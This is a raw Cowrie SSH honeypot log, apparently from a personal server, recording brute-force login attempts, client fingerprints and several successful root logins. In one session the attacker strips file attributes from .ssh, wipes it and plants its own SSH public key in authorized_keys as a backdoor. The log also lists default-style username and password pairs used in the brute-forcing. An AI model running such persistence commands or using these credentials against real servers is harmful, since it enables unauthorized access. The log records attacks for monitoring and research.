{"eventid":"cowrie.session.connect","src_ip":"58.144.199.22","src_port":49618,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecbbed4a092d","protocol":"ssh","message":"New connection: 58.144.199.22:49618 (1.2.3.4:22) [session: ecbbed4a092d]","sensor":"my-vps","timestamp":"2025-08-24T23:21:39.713699Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:21:39.714655Z","src_ip":"58.144.199.22","session":"ecbbed4a092d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:21:39.906180Z","src_ip":"58.144.199.22","session":"ecbbed4a092d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T23:21:40.715202Z","src_ip":"58.144.199.22","session":"ecbbed4a092d"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":48606,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7dfede1256e","protocol":"ssh","message":"New connection: 196.251.115.108:48606 (1.2.3.4:22) [session: d7dfede1256e]","sensor":"my-vps","timestamp":"2025-08-24T23:21:58.782970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:21:59.067489Z","src_ip":"196.251.115.108","session":"d7dfede1256e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:21:59.068170Z","src_ip":"196.251.115.108","session":"d7dfede1256e"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"123456","message":"login attempt [administrator/123456] failed","sensor":"my-vps","timestamp":"2025-08-24T23:22:02.659325Z","src_ip":"196.251.115.108","session":"d7dfede1256e"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:22:03.974217Z","src_ip":"196.251.115.108","session":"d7dfede1256e"}
{"eventid":"cowrie.session.connect","src_ip":"52.169.142.214","src_port":44072,"dst_ip":"1.2.3.4","dst_port":22,"session":"3741aaf41363","protocol":"ssh","message":"New connection: 52.169.142.214:44072 (1.2.3.4:22) [session: 3741aaf41363]","sensor":"my-vps","timestamp":"2025-08-24T23:22:33.579697Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:22:33.580453Z","src_ip":"52.169.142.214","session":"3741aaf41363"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:22:33.611565Z","src_ip":"52.169.142.214","session":"3741aaf41363"}
{"eventid":"cowrie.login.success","username":"root","password":"xsw2!QAZ","message":"login attempt [root/xsw2!QAZ] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:22:33.777331Z","src_ip":"52.169.142.214","session":"3741aaf41363"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:22:33.889273Z","src_ip":"52.169.142.214","session":"3741aaf41363"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:22:33.889980Z","src_ip":"52.169.142.214","session":"3741aaf41363"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:22:33.890881Z","src_ip":"52.169.142.214","session":"3741aaf41363"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:22:33.922820Z","src_ip":"52.169.142.214","session":"3741aaf41363"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:22:34.002041Z","src_ip":"52.169.142.214","session":"3741aaf41363"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T23:22:34.002909Z","src_ip":"52.169.142.214","session":"3741aaf41363"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T23:22:34.036158Z","src_ip":"52.169.142.214","session":"3741aaf41363"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:22:34.037098Z","src_ip":"52.169.142.214","session":"3741aaf41363"}
{"eventid":"cowrie.session.connect","src_ip":"52.169.142.214","src_port":44076,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e6df3d332f4","protocol":"ssh","message":"New connection: 52.169.142.214:44076 (1.2.3.4:22) [session: 8e6df3d332f4]","sensor":"my-vps","timestamp":"2025-08-24T23:22:34.067696Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:22:34.068396Z","src_ip":"52.169.142.214","session":"8e6df3d332f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:22:34.100069Z","src_ip":"52.169.142.214","session":"8e6df3d332f4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T23:22:34.269571Z","src_ip":"52.169.142.214","session":"8e6df3d332f4"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:22:35.304348Z","src_ip":"52.169.142.214","session":"8e6df3d332f4"}
{"eventid":"cowrie.session.connect","src_ip":"52.169.142.214","src_port":44078,"dst_ip":"1.2.3.4","dst_port":22,"session":"99de5b0e67d2","protocol":"ssh","message":"New connection: 52.169.142.214:44078 (1.2.3.4:22) [session: 99de5b0e67d2]","sensor":"my-vps","timestamp":"2025-08-24T23:22:35.334902Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:22:35.335591Z","src_ip":"52.169.142.214","session":"99de5b0e67d2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:22:35.383051Z","src_ip":"52.169.142.214","session":"99de5b0e67d2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:22:35.550904Z","src_ip":"52.169.142.214","session":"99de5b0e67d2"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:22:35.582909Z","src_ip":"52.169.142.214","session":"3741aaf41363"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:22:35.584073Z","src_ip":"52.169.142.214","session":"99de5b0e67d2"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":53152,"dst_ip":"1.2.3.4","dst_port":22,"session":"56875fad8857","protocol":"ssh","message":"New connection: 196.251.115.108:53152 (1.2.3.4:22) [session: 56875fad8857]","sensor":"my-vps","timestamp":"2025-08-24T23:22:45.835174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:22:46.185252Z","src_ip":"196.251.115.108","session":"56875fad8857"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:22:46.185921Z","src_ip":"196.251.115.108","session":"56875fad8857"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"password","message":"login attempt [administrator/password] failed","sensor":"my-vps","timestamp":"2025-08-24T23:22:48.479349Z","src_ip":"196.251.115.108","session":"56875fad8857"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:22:49.827938Z","src_ip":"196.251.115.108","session":"56875fad8857"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62650,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e7cd493e969","protocol":"ssh","message":"New connection: 217.72.205.35:62650 (1.2.3.4:22) [session: 0e7cd493e969]","sensor":"my-vps","timestamp":"2025-08-24T23:22:53.575755Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:22:53.577519Z","src_ip":"217.72.205.35","session":"0e7cd493e969"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":60272,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f1aea3ba83f","protocol":"ssh","message":"New connection: 196.251.115.108:60272 (1.2.3.4:22) [session: 4f1aea3ba83f]","sensor":"my-vps","timestamp":"2025-08-24T23:23:36.876389Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:23:37.227984Z","src_ip":"196.251.115.108","session":"4f1aea3ba83f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:23:37.228836Z","src_ip":"196.251.115.108","session":"4f1aea3ba83f"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:23:39.716141Z","src_ip":"58.144.199.22","session":"ecbbed4a092d"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"123456789","message":"login attempt [administrator/123456789] failed","sensor":"my-vps","timestamp":"2025-08-24T23:23:40.778616Z","src_ip":"196.251.115.108","session":"4f1aea3ba83f"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:23:41.944223Z","src_ip":"196.251.115.108","session":"4f1aea3ba83f"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":35400,"dst_ip":"1.2.3.4","dst_port":22,"session":"e063e41d3db5","protocol":"ssh","message":"New connection: 45.88.8.186:35400 (1.2.3.4:22) [session: e063e41d3db5]","sensor":"my-vps","timestamp":"2025-08-24T23:24:10.672228Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:24:11.275758Z","src_ip":"45.88.8.186","session":"e063e41d3db5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T23:24:11.276885Z","src_ip":"45.88.8.186","session":"e063e41d3db5"}
{"eventid":"cowrie.login.success","username":"root","password":"A1b2c3d4e5","message":"login attempt [root/A1b2c3d4e5] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:24:14.065878Z","src_ip":"45.88.8.186","session":"e063e41d3db5"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:24:14.702834Z","src_ip":"45.88.8.186","session":"e063e41d3db5"}
{"eventid":"cowrie.session.connect","src_ip":"101.126.54.167","src_port":39968,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf514685ada1","protocol":"ssh","message":"New connection: 101.126.54.167:39968 (1.2.3.4:22) [session: cf514685ada1]","sensor":"my-vps","timestamp":"2025-08-24T23:24:15.632924Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:24:15.633851Z","src_ip":"101.126.54.167","session":"cf514685ada1"}
